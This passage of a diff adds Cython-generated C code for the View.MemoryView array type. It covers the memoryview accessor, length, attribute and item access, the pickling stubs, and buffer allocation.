__pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_memview", 0); + + /* "View.MemoryView":225 + * @cname('get_memview') + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE # <<<<<<<<<<<<<< + * return memoryview(self, flags, self.dtype_is_object) + * + */ + __pyx_v_flags = ((PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT) | PyBUF_WRITABLE); + + /* "View.MemoryView":226 + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 0, ((PyObject *)__pyx_v_self)); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.array.get_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":229 + * + * def __len__(self): + * return self._shape[0] # <<<<<<<<<<<<<< + * + * def __getattr__(self, attr): + */ + __pyx_r = (__pyx_v_self->_shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr); /*proto*/ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getattr__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_attr)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getattr__", 0); + + /* "View.MemoryView":232 + * + * def __getattr__(self, attr): + * return getattr(self.memview, attr) # <<<<<<<<<<<<<< + * + * def __getitem__(self, item): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetAttr(__pyx_t_1, __pyx_v_attr); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getattr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item); /*proto*/ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":235 + * + * def __getitem__(self, item): + * return self.memview[item] # <<<<<<<<<<<<<< + * + * def __setitem__(self, item, value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_item); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + +/* Python wrapper */ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + + /* "View.MemoryView":238 + * + * def __setitem__(self, item, value): + * self.memview[item] = value # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_item, __pyx_v_value) < 0))) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_array___reduce_cython__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_array_2__setstate_cython__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_v_i; + PyObject **__pyx_v_p; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_allocate_buffer", 0); + + /* "View.MemoryView":254 + * cdef PyObject **p + * + * self.free_data = True # <<<<<<<<<<<<<< + * self.data = malloc(self.len) + * if not self.data: + */ + __pyx_v_self->free_data = 1; + + /* "View.MemoryView":255 + * + * self.free_data = True + * self.data = malloc(self.len) # <<<<<<<<<<<<<< + * if not self.data: + * raise MemoryError, "unable to allocate array data." + */ + __pyx_v_self->data = ((char *)malloc(__pyx_v_self->len)); + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + __pyx_t_1 = (!(__pyx_v_self->data != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":257 + * self.data = malloc(self.len) + * if not self.data: + * raise MemoryError, "unable to allocate array data." # <<<<<<<<<<<<<< + * + * if self.dtype_is_object: + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_array_data, 0, 0); + __PYX_ERR(1, 257, __pyx_L1_error) + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":260 + * + * if self.dtype_is_object: + * p = self.data # <<<<<<<<<<<<<< + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + */ + __pyx_v_p = ((PyObject **)__pyx_v_self->data); + + /* "View.MemoryView":261 + * if self.dtype_is_object: + * p = self.data + * for i in range(self.len // self.itemsize): # <<<<<<<<<<<<<< + * p[i] = Py_None + * Py_INCREF(Py_None) + */ + if (unlikely(__pyx_v_self->itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_self->itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_self->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_div_Py_ssize_t(__pyx_v_self->len, __pyx_v_self->itemsize); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":262 + * p = self.data + * for i in range(self.len // self.itemsize): + * p[i] = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * return 0 + */ + (__pyx_v_p[__pyx_v_i]) = Py_None; + + /* "View.MemoryView":263 + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * return 0 + * + */ + Py_INCREF(Py_None); + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + } + + /* "View.MemoryView":264 + * p[i] = Py_None + * Py_INCREF(Py_None) + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._allocate_buffer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + +static struct __pyx_array_obj *__pyx_array_new(PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, char *__pyx_v_format, char *__pyx_v_c_mode, char *__pyx_v_buf) { + struct __pyx_array_obj *__pyx_v_result = 0; + PyObject *__pyx_v_mode = 0; + struct __pyx_array_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("array_cwrapper", 0); + + /* "View.MemoryView":270 + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. # <<<<<<<<<<<<<< + * + * if buf is NULL: + */ + if (((__pyx_v_c_mode[0]) == 'f')) { + __Pyx_INCREF(__pyx_n_s_fortran); + __pyx_t_1 = __pyx_n_s_fortran; + } else { + __Pyx_INCREF(__pyx_n_s_c); + __pyx_t_1 = __pyx_n_s_c; + } + __pyx_v_mode = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + __pyx_t_2 = (__pyx_v_buf == NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":273 + * + * if buf is NULL: + * result = array.__new__(array, shape, itemsize, format, mode) # <<<<<<<<<<<<<< + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + */ + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_t_3); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_v_mode); + __pyx_t_1 = 0; + __pyx_t_3 = 0; + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_4, NULL)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":275 + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) # <<<<<<<<<<<<<< + * result.data = buf + * + */ + /*else*/ { + __pyx_t_3 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 2, 